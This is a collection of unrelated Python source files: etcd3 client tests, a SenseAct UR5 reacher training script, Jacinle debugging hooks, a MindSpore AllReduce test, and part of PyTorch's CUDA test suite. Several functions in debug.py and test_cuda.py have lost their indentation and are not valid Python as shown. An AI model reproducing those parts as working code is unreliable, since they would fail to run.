            etcd.compact(3)

    def test_channel_with_no_cert(self):
        """No TLS material at all yields an insecure channel."""
        client = etcd3.client(
            ca_cert=None,
            cert_key=None,
            cert_cert=None
        )
        assert client.uses_secure_channel is False

    @mock.patch('etcdrpc.AuthStub')
    def test_user_pwd_auth(self, auth_mock):
        """Username/password auth obtains gRPC call credentials."""
        auth_resp_mock = mock.MagicMock()
        auth_resp_mock.token = 'foo'
        auth_mock.Authenticate = auth_resp_mock
        self._enable_auth_in_etcd()

        # Create a client using username and password auth
        client = etcd3.client(
            user='root',
            password='pwd'
        )

        assert client.call_credentials is not None
        self._disable_auth_in_etcd()

    def test_user_or_pwd_auth_raises_exception(self):
        """Supplying only one of user/password is an error."""
        with pytest.raises(Exception):
            etcd3.client(user='usr')

        with pytest.raises(Exception):
            etcd3.client(password='pwd')

    def _enable_auth_in_etcd(self):
        # Helper: create the root user and switch auth on via etcdctl.
        subprocess.call(['etcdctl', '-w', 'json', 'user', 'add', 'root:pwd'])
        subprocess.call(['etcdctl', 'auth', 'enable'])

    def _disable_auth_in_etcd(self):
        # Helper: switch auth off again and remove the root user.
        subprocess.call(['etcdctl', 'user', 'remove', 'root'])
        subprocess.call(['etcdctl', '-u', 'root:pwd', 'auth', 'disable'])
class TestCompares(object):
    """Tests that Python comparison operators on transaction targets build
    the corresponding etcdrpc Compare operations."""

    def test_compare_version(self):
        """==, !=, <, > on version() map to the Compare op enums; target VERSION."""
        key = 'key'
        tx = etcd3.Transactions()

        version_compare = tx.version(key) == 1
        assert version_compare.op == etcdrpc.Compare.EQUAL

        version_compare = tx.version(key) != 2
        assert version_compare.op == etcdrpc.Compare.NOT_EQUAL

        version_compare = tx.version(key) < 91
        assert version_compare.op == etcdrpc.Compare.LESS

        version_compare = tx.version(key) > 92
        assert version_compare.op == etcdrpc.Compare.GREATER
        assert version_compare.build_message().target == \
            etcdrpc.Compare.VERSION

    def test_compare_value(self):
        """==, !=, <, > on value() map to the Compare op enums; target VALUE."""
        key = 'key'
        tx = etcd3.Transactions()

        value_compare = tx.value(key) == 'b'
        assert value_compare.op == etcdrpc.Compare.EQUAL

        value_compare = tx.value(key) != 'b'
        assert value_compare.op == etcdrpc.Compare.NOT_EQUAL

        value_compare = tx.value(key) < 'b'
        assert value_compare.op == etcdrpc.Compare.LESS

        value_compare = tx.value(key) > 'b'
        assert value_compare.op == etcdrpc.Compare.GREATER
        assert value_compare.build_message().target == etcdrpc.Compare.VALUE

    def test_compare_mod(self):
        """==, !=, <, > on mod() map to the Compare op enums; target MOD."""
        key = 'key'
        tx = etcd3.Transactions()

        mod_compare = tx.mod(key) == -100
        assert mod_compare.op == etcdrpc.Compare.EQUAL

        mod_compare = tx.mod(key) != -100
        assert mod_compare.op == etcdrpc.Compare.NOT_EQUAL

        mod_compare = tx.mod(key) < 19
        assert mod_compare.op == etcdrpc.Compare.LESS

        mod_compare = tx.mod(key) > 21
        assert mod_compare.op == etcdrpc.Compare.GREATER
        assert mod_compare.build_message().target == etcdrpc.Compare.MOD

    def test_compare_create(self):
        """==, !=, <, > on create() map to the Compare op enums; target CREATE."""
        key = 'key'
        tx = etcd3.Transactions()

        create_compare = tx.create(key) == 10
        assert create_compare.op == etcdrpc.Compare.EQUAL

        create_compare = tx.create(key) != 10
        assert create_compare.op == etcdrpc.Compare.NOT_EQUAL

        create_compare = tx.create(key) < 155
        assert create_compare.op == etcdrpc.Compare.LESS

        create_compare = tx.create(key) > -12
        assert create_compare.op == etcdrpc.Compare.GREATER
        assert create_compare.build_message().target == etcdrpc.Compare.CREATE
|
ur5_reacher_6D.py
|
#!/usr/bin/env python
# Copyright (c) 2018, The SenseAct Authors.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import argparse
import copy
import time
from multiprocessing import Process, Value, Manager
import baselines.common.tf_util as U
import numpy as np
from baselines.ppo1.mlp_policy import MlpPolicy
from baselines.trpo_mpi.trpo_mpi import learn
from helper import create_callback
from senseact.envs.ur.reacher_env import ReacherEnv
from senseact.utils import tf_set_seeds, NormalizedEnv
def main(ip):
    """Train a TRPO agent on the 6-DoF UR5 reacher task and plot progress.

    Args:
        ip: IP address (string) of the UR5 robot controller.
    """
    # use fixed random state
    rand_state = np.random.RandomState(1).get_state()
    np.random.set_state(rand_state)
    tf_set_seeds(np.random.randint(1, 2**31 - 1))

    # Create UR5 Reacher2D environment
    env = ReacherEnv(
        setup="UR5_6dof",
        host=ip,
        dof=6,
        control_type="velocity",
        target_type="position",
        reset_type="zero",
        reward_type="precision",
        derivative_type="none",
        deriv_action_max=5,
        first_deriv_max=2,
        accel_max=1.4,
        speed_max=0.3,
        speedj_a=1.4,
        episode_length_time=4.0,
        episode_length_step=None,
        actuation_sync_period=1,
        dt=0.04,
        run_mode="multiprocess",
        rllab_box=False,
        movej_t=2.0,
        delay=0.0,
        random_state=rand_state
    )
    # Normalize observations/actions around the raw environment.
    env = NormalizedEnv(env)
    # Start environment processes
    env.start()
    # Create baselines TRPO policy function
    sess = U.single_threaded_session()
    sess.__enter__()

    def policy_fn(name, ob_space, ac_space):
        return MlpPolicy(name=name, ob_space=ob_space, ac_space=ac_space,
                         hid_size=64, num_hid_layers=2)

    # Create and start plotting process
    plot_running = Value('i', 1)
    shared_returns = Manager().dict({"write_lock": False,
                                     "episodic_returns": [],
                                     "episodic_lengths": [], })
    # Spawn plotting process
    pp = Process(target=plot_ur5_reacher, args=(env, 2048, shared_returns, plot_running))
    pp.start()

    # Create callback function for logging data from baselines TRPO learn
    kindred_callback = create_callback(shared_returns)

    # Train baselines TRPO
    learn(env, policy_fn,
          max_timesteps=200000,
          timesteps_per_batch=2048,
          max_kl=0.05,
          cg_iters=10,
          cg_damping=0.1,
          vf_iters=5,
          vf_stepsize=0.001,
          gamma=0.995,
          lam=0.995,
          callback=kindred_callback
          )

    # Safely terminate plotter process
    plot_running.value = 0  # shutdown ploting process
    time.sleep(2)
    pp.join()

    env.close()
def plot_ur5_reacher(env, batch_size, shared_returns, plot_running):
    """Helper process for visualizing the task and episodic returns.

    Args:
        env: An instance of ReacherEnv
        batch_size: An int representing timesteps_per_batch provided to the TRPO learn function
        shared_returns: A manager dictionary object containing `episodic returns` and `episodic lengths`
        plot_running: A multiprocessing Value object containing 0/1.
                      1: Continue plotting, 0: Terminate plotting loop
    """
    print("Started plotting routine")
    import matplotlib.pyplot as plt
    plt.ion()
    time.sleep(5.0)
    fig = plt.figure(figsize=(20, 6))
    # Left/middle axes: live target (red) vs end-effector (blue) positions.
    ax1 = fig.add_subplot(131)
    hl1, = ax1.plot([], [], markersize=10, marker="o", color='r')
    hl2, = ax1.plot([], [], markersize=10, marker="o", color='b')
    ax1.set_xlabel("X", fontsize=14)
    h = ax1.set_ylabel("Y", fontsize=14)
    h.set_rotation(0)
    ax3 = fig.add_subplot(132)
    hl3, = ax3.plot([], [], markersize=10, marker="o", color='r')
    hl4, = ax3.plot([], [], markersize=10, marker="o", color='b')
    ax3.set_xlabel("Z", fontsize=14)
    h = ax3.set_ylabel("Y", fontsize=14)
    h.set_rotation(0)
    # Right axis: windowed learning curve.
    ax2 = fig.add_subplot(133)
    hl11, = ax2.plot([], [])
    count = 0
    old_size = len(shared_returns['episodic_returns'])
    while plot_running.value:
        plt.suptitle("Reward: {:.2f}".format(env._reward_.value), x=0.375, fontsize=14)
        hl1.set_ydata([env._x_target_[1]])
        hl1.set_xdata([env._x_target_[2]])
        hl2.set_ydata([env._x_[1]])
        hl2.set_xdata([env._x_[2]])
        ax1.set_ylim([env._end_effector_low[1], env._end_effector_high[1]])
        ax1.set_xlim([env._end_effector_low[2], env._end_effector_high[2]])
        ax1.set_title("X-Y plane", fontsize=14)
        ax1.set_xlim(ax1.get_xlim()[::-1])
        ax1.set_ylim(ax1.get_ylim()[::-1])
        hl3.set_ydata([env._x_target_[1]])
        hl3.set_xdata([env._x_target_[0]])
        hl4.set_ydata([env._x_[1]])
        hl4.set_xdata([env._x_[0]])
        ax3.set_ylim([env._end_effector_low[1], env._end_effector_high[1]])
        ax3.set_xlim([env._end_effector_low[0], env._end_effector_high[0]])
        ax3.set_title("Y-Z plane", fontsize=14)
        ax3.set_xlim(ax3.get_xlim()[::-1])
        ax3.set_ylim(ax3.get_ylim()[::-1])

        # make a copy of the whole dict to avoid episode_returns and episodic_lengths getting desync
        # while plotting
        copied_returns = copy.deepcopy(shared_returns)
        if not copied_returns['write_lock'] and len(copied_returns['episodic_returns']) > old_size:
            # plot learning curve
            returns = np.array(copied_returns['episodic_returns'])
            old_size = len(copied_returns['episodic_returns'])
            window_size_steps = 5000
            x_tick = 1000

            if copied_returns['episodic_lengths']:
                ep_lens = np.array(copied_returns['episodic_lengths'])
            else:
                ep_lens = batch_size * np.arange(len(returns))
            cum_episode_lengths = np.cumsum(ep_lens)

            if cum_episode_lengths[-1] >= x_tick:
                steps_show = np.arange(x_tick, cum_episode_lengths[-1] + 1, x_tick)
                rets = []

                for i in range(len(steps_show)):
                    rets_in_window = returns[(cum_episode_lengths > max(0, x_tick * (i + 1) - window_size_steps)) *
                                             (cum_episode_lengths < x_tick * (i + 1))]
                    # NOTE(review): .any() also skips windows whose returns are all
                    # exactly 0 — .size may be intended; confirm before changing.
                    if rets_in_window.any():
                        rets.append(np.mean(rets_in_window))

                # Fix: every window can be empty early in training; without this
                # guard np.min/np.max on an empty list raises ValueError and
                # kills the plotting process.
                if rets:
                    hl11.set_xdata(np.arange(1, len(rets) + 1) * x_tick)
                    ax2.set_xlim([x_tick, len(rets) * x_tick])
                    hl11.set_ydata(rets)
                    ax2.set_ylim([np.min(rets), np.max(rets) + 50])
        time.sleep(0.01)
        fig.canvas.draw()
        fig.canvas.flush_events()
        count += 1
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument("--ip", default=None, help="IP address of the UR5")
    args = parser.parse_args()
    # Forward parsed CLI options (just `ip`) as keyword arguments.
    main(**args.__dict__)
|
debug.py
|
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
# File : debug.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 08/26/2019
#
# This file is part of Jacinle.
# Distributed under terms of the MIT license.
import sys
import functools
import threading
import contextlib
__all__ = ['hook_exception_ipdb', 'unhook_exception_ipdb', 'exception_hook']
def _custom_exception_hook(type, value, tb):
if hasattr(sys, 'ps1') or not sys.stderr.isatty():
# we are in interactive mode or we don't have a tty-like
# device, so we call the default hook
sys.__excepthook__(type, value, tb)
else:
import traceback, ipdb
# we are NOT in interactive mode, print the exception...
traceback.print_exception(type, value, tb)
# ...then start the debugger in post-mortem mode.
ipdb.post_mortem(tb)
def hook_exception_ipdb():
    """Install the ipdb post-mortem excepthook, remembering the active one."""
    # Only stash the original hook once, so repeated calls don't overwrite
    # it with our own hook.
    if not hasattr(_custom_exception_hook, 'origin_hook'):
        _custom_exception_hook.origin_hook = sys.excepthook
    sys.excepthook = _custom_exception_hook
def unhook_exception_ipdb():
    """Restore the excepthook saved by hook_exception_ipdb."""
    assert hasattr(_custom_exception_hook, 'origin_hook')
    sys.excepthook = _custom_exception_hook.origin_hook
@contextlib.contextmanager
def exception_hook(enable=True):
    """Context manager enabling the ipdb excepthook inside the with-block.

    NOTE(review): there is no try/finally — if the body raises, the hook
    stays installed, which lets the uncaught exception still trigger ipdb
    at top level. Confirm that is intended before "fixing" it.
    """
    if enable:
        hook_exception_ipdb()
        yield
        unhook_exception_ipdb()
    else:
        yield
def decorate_exception_hook(func):
    """Decorator form of exception_hook: wraps each call of *func* in it."""
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        with exception_hook():
            return func(*args, **kwargs)
    return wrapper
def _TimeoutEnterIpdbThread(locals_, cv, timeout):
    """Watchdog body: break into ipdb unless notified within `timeout` seconds."""
    with cv:
        if not cv.wait(timeout):
            import ipdb; ipdb.set_trace()


@contextlib.contextmanager
def timeout_ipdb(locals_, timeout=3):
    """Open ipdb if the with-block runs (or hangs) longer than `timeout` seconds.

    Fix: the watchdog is now cancelled in a ``finally`` block and joined.
    Previously, an exception in the body skipped ``cv.notify_all()``, leaving
    the watchdog thread alive to break into ipdb `timeout` seconds later.
    """
    cv = threading.Condition()
    thread = threading.Thread(target=_TimeoutEnterIpdbThread,
                              args=(locals_, cv, timeout))
    thread.start()
    try:
        yield
    finally:
        with cv:
            cv.notify_all()
        thread.join()
|
test_pynative_hccl.py
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test bert thor performance with 8p on mlperf dataset"""
import os
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.nn as nn
from mindspore import Tensor
from mindspore import dtype as mstype
from mindspore.ops import operations as P
import mindspore.communication.management as D
from mindspore import context
from mindspore.context import ParallelMode
# Rank table describing the 8-device Ascend topology used for HCCL init.
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
# Fixed seed for reproducible test inputs.
np.random.seed(1)
# Raise the MindSpore glog verbosity threshold to 2 — presumably warnings
# and above; TODO confirm the level mapping.
os.environ['GLOG_v'] = str(2)
class AllReduceNet(nn.Cell):
    """Minimal network whose forward pass is a single AllReduce op."""
    def __init__(self):
        super(AllReduceNet, self).__init__()
        self.all_reduce = P.AllReduce()

    def construct(self, x):
        # Reduce x across all devices in the communication group
        # (sum, per the input*8 expectation in train_allreduce_8p).
        return self.all_reduce(x)
def train_allreduce_8p(q, device_id, device_num):
    """Run one AllReduce on a single Ascend device and report correctness.

    Executed in its own process per device. Puts True into `q` when the
    all-reduced output equals input * device_num (sum over all ranks).

    Args:
        q: multiprocessing Queue collecting one bool result per worker.
        device_id: Ascend device / rank id for this worker.
        device_num: total number of participating devices.
    """
    # Per-device working directory. Fix: os.makedirs(exist_ok=True) instead
    # of os.system("mkdir ...") — no shell, and tolerant of leftovers from a
    # previous aborted run.
    os.makedirs(str(device_id), exist_ok=True)
    os.chdir(str(device_id))
    context.set_context(mode=context.PYNATIVE_MODE, device_target="Ascend", device_id=device_id)
    os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
    os.environ['RANK_ID'] = str(device_id)
    os.environ['RANK_SIZE'] = str(device_num)
    D.init()
    context.reset_auto_parallel_context()
    context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True,
                                      device_num=device_num)

    net = AllReduceNet()
    input_x = np.ones([32, 255, 255, 3]).astype(np.float32)
    # Fix: typo `except_output` -> `expected_output`; generalized the
    # hard-coded 8 to device_num so the helper works for any world size.
    expected_output = input_x * device_num
    output = net(Tensor(input_x, mstype.float32))
    q.put(np.allclose(output.asnumpy(), expected_output))
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_pynative_hccl_8p():
    """Spawn one worker per Ascend device and require every AllReduce to pass."""
    device_num = 8
    q = Queue()
    workers = [Process(target=train_allreduce_8p, args=(q, device_id, device_num))
               for device_id in range(device_num)]
    for worker in workers:
        worker.start()

    print("Waiting for all subprocesses done...")
    for worker in workers:
        worker.join()

    # check result: every worker must have reported a correct all-reduce.
    for _ in range(device_num):
        assert q.get()

    # Remove the per-device working directories the workers created.
    for device_id in range(device_num):
        os.system("rm -rf " + str(device_id))

    print("End training...")
|
test_cuda.py
|
# Owner(s): ["module: cuda"]
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY, \
get_cycles_per_ms
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests

# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2

if not TEST_CUDA:
    print('CUDA not available, skipping tests', file=sys.stderr)
    # With no CUDA, neutralize the whole suite by replacing TestCase.
    TestCase = object  # noqa: F811

TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
TEST_BF16 = False
if TEST_CUDA:
    torch.ones(1).cuda()  # initialize cuda context
    TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
                                torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
    # Capability gates: ~12 GB device memory for "large tensor" tests,
    # ~6 GB for "medium".
    TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
    TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
    TEST_BF16 = torch.cuda.is_bf16_supported()

# Legacy tensor types exercised by type-parameterized tests below.
types = [
    torch.FloatTensor,
    torch.DoubleTensor,
    torch.LongTensor,
    torch.IntTensor,
    torch.ShortTensor,
    torch.CharTensor,
    torch.ByteTensor,
    torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
    """Build a sparse tensor of type `t` with `n` random entries and shape `sizes`."""
    assert t.is_sparse
    prototype = t()
    # Random coordinates: one row per dimension, each bounded by that dim's size.
    index_rows = [torch.LongTensor(1, n).random_(dim) for dim in sizes]
    indices = prototype._indices().new(len(sizes), n).copy_(torch.cat(index_rows, 0))
    values = prototype._values().new(n).copy_(torch.randn(n))
    return t(indices, values, torch.Size(sizes))
# Cached GPU cycles-per-millisecond measurement; None until first computed
# (presumably filled in lazily via get_cycles_per_ms — confirm).
_cycles_per_ms = None
class TestCuda(TestCase):
    """Tests for torch.cuda: allocator/memory stats, streams, events, serialization."""
    # Flags presumably read by the common_utils.TestCase harness — enable the
    # per-test CUDA memory-leak check and non-default-stream execution.
    _do_cuda_memory_leak_check = True
    _do_cuda_non_default_stream = True
    # Busy-wait length used with torch.cuda._sleep to keep the GPU occupied (~tens of ms).
    FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
    def _check_memory_stat_consistency(self):
        """Cross-check torch.cuda.memory_stats against a recount of memory_snapshot.

        Rebuilds the expected per-device "current" counters (segments, bytes,
        allocations, inactive splits) from the raw snapshot and asserts each
        one matches the corresponding memory_stats entry.
        """
        snapshot = torch.cuda.memory_snapshot()
        expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
        for segment in snapshot:
            expected = expected_each_device[segment["device"]]
            pool_str = segment["segment_type"] + "_pool"
            expected["segment.all.current"] += 1
            expected["segment." + pool_str + ".current"] += 1
            expected["allocated_bytes.all.current"] += segment["allocated_size"]
            expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
            expected["reserved_bytes.all.current"] += segment["total_size"]
            expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
            expected["active_bytes.all.current"] += segment["active_size"]
            expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
            # a segment holding more than one block has been split by the allocator
            is_split = len(segment["blocks"]) > 1
            for block in segment["blocks"]:
                if block["state"] == "active_allocated":
                    expected["allocation.all.current"] += 1
                    expected["allocation." + pool_str + ".current"] += 1
                if block["state"].startswith("active_"):
                    expected["active.all.current"] += 1
                    expected["active." + pool_str + ".current"] += 1
                if block["state"] == "inactive" and is_split:
                    expected["inactive_split.all.current"] += 1
                    expected["inactive_split." + pool_str + ".current"] += 1
                    expected["inactive_split_bytes.all.current"] += block["size"]
                    expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
        for device, expected in expected_each_device.items():
            stats = torch.cuda.memory_stats(device)
            for k, v in expected.items():
                self.assertEqual(v, stats[k])
    @staticmethod
    def _test_memory_stats_generator(self, device=None, N=35):
        """Generator driving a scripted allocate/free schedule on *device*.

        The last-seen and peak values of memory_allocated / memory_reserved
        are kept in one-element lists so the assert_change closure can update
        them in place.  The generator yields after each phase so callers can
        interleave two devices or run consistency checks; it yields True once
        near the end so multi-GPU callers can detect the final stage.
        """
        if device is None:
            device = torch.cuda.current_device()
        m0 = torch.cuda.memory_allocated(device)
        last_m_arr = [torch.cuda.memory_allocated(device)]
        max_m_arr = [torch.cuda.max_memory_allocated(device)]
        last_r_arr = [torch.cuda.memory_reserved(device)]
        max_r_arr = [torch.cuda.max_memory_reserved(device)]
        def alloc(*size):
            # Allocate an uninitialized CUDA float tensor of the given shape.
            with torch.cuda.device(device):
                # NOTE: do **not** use methods that can have additional
                # memory overhead, e.g., inplace random sampling methods.
                # they can leave some memory occupied even after being
                # deallocated, e.g., initialized RNG state, causing some
                # memory checks below to fail.
                return torch.cuda.FloatTensor(*size)
        def assert_change(comp=1, empty_cache=False, reset_peak=False):
            # comp > 0: increased
            # comp = 0: equal
            # comp < 0: decreased
            new_m = torch.cuda.memory_allocated(device)
            new_max_m = torch.cuda.max_memory_allocated(device)
            if comp > 0:
                self.assertGreater(new_m, last_m_arr[0])
            elif comp < 0:
                self.assertLess(new_m, last_m_arr[0])
            else:
                self.assertEqual(new_m, last_m_arr[0])
            self.assertLessEqual(new_m, new_max_m)
            self.assertGreaterEqual(new_max_m, max_m_arr[0])
            last_m_arr[0] = new_m
            max_m_arr[0] = new_max_m
            new_r = torch.cuda.memory_reserved(device)
            new_max_r = torch.cuda.max_memory_reserved(device)
            # emptying cache may happen (due to allocation or empty_cache), so
            # we can't assert new_c >= last_c
            self.assertLessEqual(new_r, new_max_r)
            self.assertGreaterEqual(new_max_r, max_r_arr[0])
            last_r_arr[0] = new_r
            max_r_arr[0] = new_max_r
            if empty_cache:
                torch.cuda.empty_cache()
                new_r = torch.cuda.memory_reserved(device)
                new_max_r = torch.cuda.max_memory_reserved(device)
                self.assertLessEqual(new_r, last_r_arr[0])
                self.assertLessEqual(new_r, new_max_r)
                self.assertEqual(new_max_r, max_r_arr[0])
                last_r_arr[0] = new_r
            if reset_peak:
                # after resetting, peaks must collapse down to the current values
                torch.cuda.reset_peak_memory_stats(device)
                self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
                self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
                max_m_arr[0] = last_m_arr[0]
                self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
                self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
                max_r_arr[0] = last_r_arr[0]
        assert_change(0)
        assert_change(0, reset_peak=True)
        assert_change(0, empty_cache=True)
        assert_change(0, reset_peak=True)
        assert_change(0)
        yield
        tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
        m1 = torch.cuda.memory_allocated(device)
        assert_change(1)
        yield
        tensors2 = []
        for i in range(1, int(N / 2) + 1):
            # small ones
            tensors2.append(alloc(i, i * 4))
            assert_change(1)
        yield
        for i in range(5, int(N / 2) + 5):
            # large ones
            tensors2.append(alloc(i, i * 7, i * 9, i * 11))
            assert_change(1, reset_peak=(i % 2 == 0))
        yield
        tensors2.append(alloc(0, 0, 0))
        assert_change(0)
        yield
        permute = []
        for i in torch.randperm(len(tensors2)):
            permute.append(tensors2[i])
            assert_change(0)
        yield
        del tensors2
        assert_change(0)
        yield
        tensors2 = permute
        assert_change(0)
        yield
        del permute
        assert_change(0, reset_peak=True)
        yield
        for i in range(int(N / 2)):
            x = tensors2[i].numel()
            del tensors2[i]
            assert_change(-x)  # in case that tensors2[i] is empty
            yield
        for i in range(2, int(2 * N / 3) + 2):
            tensors2.append(alloc(i, i * 3, i * 8))
            assert_change(1)
            yield
        del tensors2
        assert_change(-1, reset_peak=True)
        assert_change(0)
        self.assertEqual(torch.cuda.memory_allocated(device), m1)
        yield True
        del tensors1
        assert_change(-1, reset_peak=True)
        self.assertEqual(torch.cuda.memory_allocated(device), m0)
        # test empty_cache and reset_peak
        assert_change(0, empty_cache=True)
        assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
def test_memory_stats(self):
gc.collect()
torch.cuda.empty_cache()
for _ in self._test_memory_stats_generator(self):
self._check_memory_stat_consistency()
def test_memory_allocation(self):
gc.collect()
torch.cuda.empty_cache()
mem = None
size = 1
prev = 0
try:
prev = torch.cuda.memory_allocated()
mem = torch.cuda.caching_allocator_alloc(size)
self.assertGreater(torch.cuda.memory_allocated(), prev)
finally:
if mem is not None:
torch.cuda.caching_allocator_delete(mem)
self.assertEqual(torch.cuda.memory_allocated(), prev)
def test_check_error(self):
# Assert this call doesn't raise.
torch.cuda.check_error(0)
with self.assertRaisesRegex(torch.cuda.CudaError,
"out of memory|hipErrorOutOfMemory"):
torch.cuda.check_error(2)
def test_cuda_get_device_name(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_name = torch.cuda.get_device_name(current_device)
device_name_None = torch.cuda.get_device_name(None)
self.assertEqual(current_device_name, device_name_None)
# Testing the behaviour for No argument
device_name_no_argument = torch.cuda.get_device_name()
self.assertEqual(current_device_name, device_name_no_argument)
def test_cuda_get_device_capability(self):
# Testing the behaviour with None as an argument
current_device = torch.cuda.current_device()
current_device_capability = torch.cuda.get_device_capability(current_device)
device_capability_None = torch.cuda.get_device_capability(None)
self.assertEqual(current_device_capability, device_capability_None)
# Testing the behaviour for No argument
device_capability_no_argument = torch.cuda.get_device_capability()
self.assertEqual(current_device_capability, device_capability_no_argument)
    @unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
    def test_memory_stats_multigpu(self):
        """Run the memory-stats schedule on two devices: lockstep, then semi-random order."""
        # advance a generator with a end flag
        def advance(gen, end):
            if not end:
                try:
                    next(gen)
                except StopIteration:
                    end = True
            return end
        # interlace
        torch.cuda.empty_cache()
        gen0 = self._test_memory_stats_generator(self, device='cuda:0', N=35)
        gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
        end0 = end1 = False
        while not (end0 and end1):
            end0 = advance(gen0, end0)
            end1 = advance(gen1, end1)
        # semi-random order
        torch.cuda.empty_cache()
        gen0 = self._test_memory_stats_generator(self, device=0, N=35)
        gen1 = self._test_memory_stats_generator(self, device=torch.device('cuda:1'), N=35)
        end0 = end1 = False
        while not (end0 and end1):
            end0 = advance(gen0, end0)
            if not end0:
                # advance gen1 a random number of steps (0-2) per gen0 step
                gen1_max_times = torch.LongTensor(1).random_(0, 3)[0]
            else:
                # once gen0 is exhausted, drain gen1 without limit
                gen1_max_times = inf
            t = 0
            while t < gen1_max_times and not end1:
                end1 = advance(gen1, end1)
                t += 1
    def test_out_of_memory(self):
        """Impossible allocations raise informative errors and leave the device usable."""
        tensor = torch.zeros(1024, device='cuda')
        with self.assertRaisesRegex(RuntimeError, "Tried to allocate 800000000.00 GiB"):
            torch.empty(1024 * 1024 * 1024 * 800000000, dtype=torch.int8, device='cuda')
        with self.assertRaisesRegex(RuntimeError, "Tried to allocate more than 1EB memory"):
            torch.empty(1024 * 1024 * 1024 * 8000000000, dtype=torch.int8, device='cuda')
        # ensure out of memory error doesn't disturb subsequent kernel
        tensor.fill_(1)
        self.assertTrue((tensor == 1).all())
    def test_set_per_process_memory_fraction(self):
        """set_per_process_memory_fraction validates input and caps allocations at the fraction."""
        # test invalid fraction value.
        with self.assertRaisesRegex(TypeError, "Invalid type"):
            torch.cuda.set_per_process_memory_fraction(int(1))
        with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
            torch.cuda.set_per_process_memory_fraction(-0.1)
        with self.assertRaisesRegex(ValueError, "Invalid fraction value"):
            torch.cuda.set_per_process_memory_fraction(2.0)
        tensor = torch.zeros(1024, device='cuda')
        torch.cuda.empty_cache()
        total_memory = torch.cuda.get_device_properties(0).total_memory
        torch.cuda.set_per_process_memory_fraction(0.5, 0)
        # test 0.499 allocation is ok.
        application = int(total_memory * 0.499) - torch.cuda.max_memory_reserved()
        tmp_tensor = torch.empty(application, dtype=torch.int8, device='cuda')
        del tmp_tensor
        torch.cuda.empty_cache()
        application = int(total_memory * 0.5)
        # it will get OOM when try to allocate more than half memory.
        with self.assertRaisesRegex(RuntimeError, "out of memory"):
            torch.empty(application, dtype=torch.int8, device='cuda')
        # ensure out of memory error doesn't disturb subsequent kernel
